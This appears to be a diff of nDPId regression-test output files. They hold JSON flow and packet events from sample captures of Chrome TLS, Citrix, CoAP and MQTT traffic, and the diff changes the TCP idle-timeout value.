00936{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":128,"source":"chrome.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1620902509273,"flow_last_seen":1620902509333,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":635,"flow_tot_l4_payload_len":895,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":1620902509333,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":64409,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"www.iit.cnr.it","ja3":"1b73862eae8f1711440a446b1ef357fd","ja3s":"2253c82f03b621c5144709b393fde2c9","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
00936{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":132,"source":"chrome.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1620902509272,"flow_last_seen":1620902509335,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":635,"flow_tot_l4_payload_len":895,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":1620902509335,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":64408,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"www.iit.cnr.it","ja3":"1b73862eae8f1711440a446b1ef357fd","ja3s":"2253c82f03b621c5144709b393fde2c9","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
00938{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":136,"source":"chrome.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1620902509276,"flow_last_seen":1620902509338,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":1620902509338,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":64411,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"www.iit.cnr.it","ja3":"aa50c12a5dfa717d9d6ab34e97de79d5","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
00938{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":143,"source":"chrome.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1620902509274,"flow_last_seen":1620902509342,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":1620902509342,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":64410,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"www.iit.cnr.it","ja3":"aa50c12a5dfa717d9d6ab34e97de79d5","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
00675{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5633,"source":"chrome.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":862,"flow_first_seen":1620902507870,"flow_last_seen":1620902514626,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":687973,"flow_avg_l4_payload_len":798,"midstream":0,"thread_ts_msec":1620902515049,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":64393,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}}
00676{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5633,"source":"chrome.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":1134,"flow_first_seen":1620902508740,"flow_last_seen":1620902515037,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":930115,"flow_avg_l4_payload_len":820,"midstream":0,"thread_ts_msec":1620902515049,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":64394,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}}
00675{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5633,"source":"chrome.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":376,"flow_first_seen":1620902509272,"flow_last_seen":1620902515049,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":297726,"flow_avg_l4_payload_len":791,"midstream":0,"thread_ts_msec":1620902515049,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":64408,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}}
00675{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5633,"source":"chrome.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":956,"flow_first_seen":1620902509273,"flow_last_seen":1620902515019,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":773272,"flow_avg_l4_payload_len":808,"midstream":0,"thread_ts_msec":1620902515049,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":64409,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}}
00676{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5633,"source":"chrome.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":1106,"flow_first_seen":1620902509274,"flow_last_seen":1620902515040,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":914291,"flow_avg_l4_payload_len":826,"midstream":0,"thread_ts_msec":1620902515049,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":64410,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}}
00677{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5633,"source":"chrome.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":1199,"flow_first_seen":1620902509276,"flow_last_seen":1620902515049,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1009870,"flow_avg_l4_payload_len":842,"midstream":0,"thread_ts_msec":1620902515049,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":64411,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}}
00561{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":5633,"source":"chrome.pcap","alias":"nDPId-test","packets-captured":5633,"packets-processed":5633,"total-skipped-flows":0,"total-l4-data-len":4613247,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":6,"total-detection-updates":6,"total-updates":0,"current-active-flows":0,"total-active-flows":6,"total-idle-flows":6,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":45,"global_ts_msec":1620902515049}
~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~
~~ packets captured/processed: 5633/5633

12
test/results/citrix.pcap.out
View File

@@ -1,10 +1,10 @@
00457{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"citrix.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0}
00530{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"citrix.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":0,"flow_last_seen":0,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":0,"l3_proto":"ip4","src_ip":"21.0.0.8","dst_ip":"22.0.0.7","src_port":45225,"dst_port":1494,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00440{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"citrix.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":0,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":64,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":64,"pkt_l4_len":24,"thread_ts_msec":0,"pkt":"4F+5aekiABUXp3WjCABFAAAsrYMAAIAGYjoVAAAIFgAAB7CpBdYP1me4AAAAAGACgAC\/CQAAAgQFtAAA6CmQmA=="}
00439{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"citrix.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":2,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":64,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":64,"pkt_l4_len":24,"thread_ts_msec":2,"pkt":"ABUXp3Wj4F+5aekiCABFAAAsrVIAAH4GZGsWAAAHFQAACAXWsKkP1nFlD9ZnuWASgAA9vQAAAgQFtAAA3WOanQ=="}
00439{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"citrix.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":2,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":64,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":64,"pkt_l4_len":20,"thread_ts_msec":2,"pkt":"4F+5aekiABUXp3WjCABFAAAorYQAAIAGYj0VAAAIFgAAB7CpBdYP1me5D9ZxZlAQgABVegAAAAAAAAAAIuNIFQ=="}
00591{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"citrix.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":2,"flow_last_seen":8,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":6,"flow_tot_l4_payload_len":6,"flow_avg_l4_payload_len":1,"midstream":0,"thread_ts_msec":8,"l3_proto":"ip4","src_ip":"21.0.0.8","dst_ip":"22.0.0.7","src_port":45225,"dst_port":1494,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Citrix","breed":"Acceptable","category":"Network"}}
00646{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":100,"source":"citrix.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":100,"flow_first_seen":2,"flow_last_seen":1605,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":855,"flow_tot_l4_payload_len":5490,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1605,"l3_proto":"ip4","src_ip":"21.0.0.8","dst_ip":"22.0.0.7","src_port":45225,"dst_port":1494,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Citrix","breed":"Acceptable","category":"Network"}}
00530{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"citrix.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":0,"flow_last_seen":0,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":0,"l3_proto":"ip4","src_ip":"21.0.0.8","dst_ip":"22.0.0.7","src_port":45225,"dst_port":1494,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00440{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"citrix.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":0,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":64,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":64,"pkt_l4_len":24,"thread_ts_msec":0,"pkt":"4F+5aekiABUXp3WjCABFAAAsrYMAAIAGYjoVAAAIFgAAB7CpBdYP1me4AAAAAGACgAC\/CQAAAgQFtAAA6CmQmA=="}
00439{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"citrix.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":2,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":64,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":64,"pkt_l4_len":24,"thread_ts_msec":2,"pkt":"ABUXp3Wj4F+5aekiCABFAAAsrVIAAH4GZGsWAAAHFQAACAXWsKkP1nFlD9ZnuWASgAA9vQAAAgQFtAAA3WOanQ=="}
00439{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"citrix.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":2,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":64,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":64,"pkt_l4_len":20,"thread_ts_msec":2,"pkt":"4F+5aekiABUXp3WjCABFAAAorYQAAIAGYj0VAAAIFgAAB7CpBdYP1me5D9ZxZlAQgABVegAAAAAAAAAAIuNIFQ=="}
00591{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"citrix.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":2,"flow_last_seen":8,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":6,"flow_tot_l4_payload_len":6,"flow_avg_l4_payload_len":1,"midstream":0,"thread_ts_msec":8,"l3_proto":"ip4","src_ip":"21.0.0.8","dst_ip":"22.0.0.7","src_port":45225,"dst_port":1494,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Citrix","breed":"Acceptable","category":"Network"}}
00646{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":100,"source":"citrix.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":100,"flow_first_seen":2,"flow_last_seen":1605,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":855,"flow_tot_l4_payload_len":5490,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1605,"l3_proto":"ip4","src_ip":"21.0.0.8","dst_ip":"22.0.0.7","src_port":45225,"dst_port":1494,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Citrix","breed":"Acceptable","category":"Network"}}
00545{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":100,"source":"citrix.pcap","alias":"nDPId-test","packets-captured":100,"packets-processed":100,"total-skipped-flows":0,"total-l4-data-len":5490,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":8,"global_ts_msec":1605}
~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~
~~ packets captured/processed: 100/100

48
test/results/coap_mqtt.pcap.out
View File

@@ -38,32 +38,32 @@
00660{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":16,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1375090528017,"flow_last_seen":1375090529165,"flow_idle_time":180000,"flow_min_l4_payload_len":4,"flow_max_l4_payload_len":129,"flow_tot_l4_payload_len":156,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1375090935293,"l3_proto":"ip6","src_ip":"bbbb::1","dst_ip":"bbbb::3","src_port":33499,"dst_port":5683,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"COAP","breed":"Safe","category":"RPC"}}
00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":16,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":3,"flow_last_seen":1375091005616,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":85,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":85,"pkt_l4_len":31,"thread_ts_msec":1375091005616,"pkt":"uCfrprIvACTop0mhht1gAAAAAB8RQLu7AAAAAAAAAAAAAAAAAAG7uwAAAAAAAAAAAAAAAAADtuMWMwAfsCNAAZUjt3N0b3JhZ2UKbXlyZXNvdXJjZQ=="}
00552{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":20,"source":"coap_mqtt.pcap","alias":"nDPId-test","packets-captured":20,"packets-processed":19,"total-skipped-flows":0,"total-l4-data-len":436,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":8,"total-detection-updates":0,"total-updates":0,"current-active-flows":2,"total-active-flows":8,"total-idle-flows":6,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":40,"global_ts_msec":1455907243976}
00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":20,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455907243976,"flow_last_seen":1455907243976,"flow_idle_time":7440000,"flow_min_l4_payload_len":2,"flow_max_l4_payload_len":2,"flow_tot_l4_payload_len":2,"flow_avg_l4_payload_len":2,"midstream":1,"thread_ts_msec":1455907243976,"l3_proto":"ip4","src_ip":"192.168.56.1","dst_ip":"192.168.56.101","src_port":53522,"dst_port":17501,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":20,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1455907243976,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":22,"thread_ts_msec":1455907243976,"pkt":"CAAnmO\/hCAAnAERyCABFAAAqELhAAIAG+F7AqDgBwKg4ZdESRF16higakEiEGVAYAQAwoAAAwAAAAAAA"}
00776{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":20,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455907243976,"flow_last_seen":1455907243976,"flow_idle_time":7440000,"flow_min_l4_payload_len":2,"flow_max_l4_payload_len":2,"flow_tot_l4_payload_len":2,"flow_avg_l4_payload_len":2,"midstream":1,"thread_ts_msec":1455907243976,"l3_proto":"ip4","src_ip":"192.168.56.1","dst_ip":"192.168.56.101","src_port":53522,"dst_port":17501,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"MQTT","breed":"Acceptable","category":"RPC"}}
00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":21,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":2,"flow_last_seen":1455907243977,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":56,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":56,"pkt_l4_len":22,"thread_ts_msec":1455907243977,"pkt":"CAAnAERyCAAnmO\/hCABFAAAqrABAAEAGnRbAqDhlwKg4AURd0RKQSIQZeoYoHFAYAOXx0wAA0AA="}
00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":22,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":3,"flow_last_seen":1455907244175,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1455907244175,"pkt":"CAAnmO\/hCAAnAERyCABFAAAoELlAAIAG+F\/AqDgBwKg4ZdESRF16higckEiEG1AQAQDwpgAAAAAAAAAA"}
00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":20,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455907243976,"flow_last_seen":1455907243976,"flow_idle_time":7560000,"flow_min_l4_payload_len":2,"flow_max_l4_payload_len":2,"flow_tot_l4_payload_len":2,"flow_avg_l4_payload_len":2,"midstream":1,"thread_ts_msec":1455907243976,"l3_proto":"ip4","src_ip":"192.168.56.1","dst_ip":"192.168.56.101","src_port":53522,"dst_port":17501,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":20,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1455907243976,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":22,"thread_ts_msec":1455907243976,"pkt":"CAAnmO\/hCAAnAERyCABFAAAqELhAAIAG+F7AqDgBwKg4ZdESRF16higakEiEGVAYAQAwoAAAwAAAAAAA"}
00776{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":20,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455907243976,"flow_last_seen":1455907243976,"flow_idle_time":7560000,"flow_min_l4_payload_len":2,"flow_max_l4_payload_len":2,"flow_tot_l4_payload_len":2,"flow_avg_l4_payload_len":2,"midstream":1,"thread_ts_msec":1455907243976,"l3_proto":"ip4","src_ip":"192.168.56.1","dst_ip":"192.168.56.101","src_port":53522,"dst_port":17501,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"MQTT","breed":"Acceptable","category":"RPC"}}
00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":21,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":2,"flow_last_seen":1455907243977,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":56,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":56,"pkt_l4_len":22,"thread_ts_msec":1455907243977,"pkt":"CAAnAERyCAAnmO\/hCABFAAAqrABAAEAGnRbAqDhlwKg4AURd0RKQSIQZeoYoHFAYAOXx0wAA0AA="}
00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":22,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":3,"flow_last_seen":1455907244175,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1455907244175,"pkt":"CAAnmO\/hCAAnAERyCABFAAAoELlAAIAG+F\/AqDgBwKg4ZdESRF16higckEiEG1AQAQDwpgAAAAAAAAAA"}
00658{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":23,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1375090926676,"flow_last_seen":1375090935086,"flow_idle_time":180000,"flow_min_l4_payload_len":4,"flow_max_l4_payload_len":23,"flow_tot_l4_payload_len":61,"flow_avg_l4_payload_len":15,"midstream":0,"thread_ts_msec":1455907244175,"l3_proto":"ip6","src_ip":"bbbb::1","dst_ip":"bbbb::3","src_port":50250,"dst_port":5683,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"COAP","breed":"Safe","category":"RPC"}}
00658{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":23,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1375090935240,"flow_last_seen":1375091022272,"flow_idle_time":180000,"flow_min_l4_payload_len":4,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":95,"flow_avg_l4_payload_len":15,"midstream":0,"thread_ts_msec":1455907244175,"l3_proto":"ip6","src_ip":"bbbb::1","dst_ip":"bbbb::3","src_port":46819,"dst_port":5683,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"COAP","breed":"Safe","category":"RPC"}}
00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":23,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455907258332,"flow_last_seen":1455907258332,"flow_idle_time":7440000,"flow_min_l4_payload_len":2,"flow_max_l4_payload_len":2,"flow_tot_l4_payload_len":2,"flow_avg_l4_payload_len":2,"midstream":1,"thread_ts_msec":1455907258332,"l3_proto":"ip4","src_ip":"192.168.56.1","dst_ip":"192.168.56.101","src_port":53523,"dst_port":17501,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":23,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":1,"flow_last_seen":1455907258332,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":22,"thread_ts_msec":1455907258332,"pkt":"CAAnmO\/hCAAnAERyCABFAAAqELpAAIAG+FzAqDgBwKg4ZdETRF1NYgogm49Jd1AYAQCrGAAAwAAAAAAA"}
00777{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":23,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455907258332,"flow_last_seen":1455907258332,"flow_idle_time":7440000,"flow_min_l4_payload_len":2,"flow_max_l4_payload_len":2,"flow_tot_l4_payload_len":2,"flow_avg_l4_payload_len":2,"midstream":1,"thread_ts_msec":1455907258332,"l3_proto":"ip4","src_ip":"192.168.56.1","dst_ip":"192.168.56.101","src_port":53523,"dst_port":17501,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"MQTT","breed":"Acceptable","category":"RPC"}}
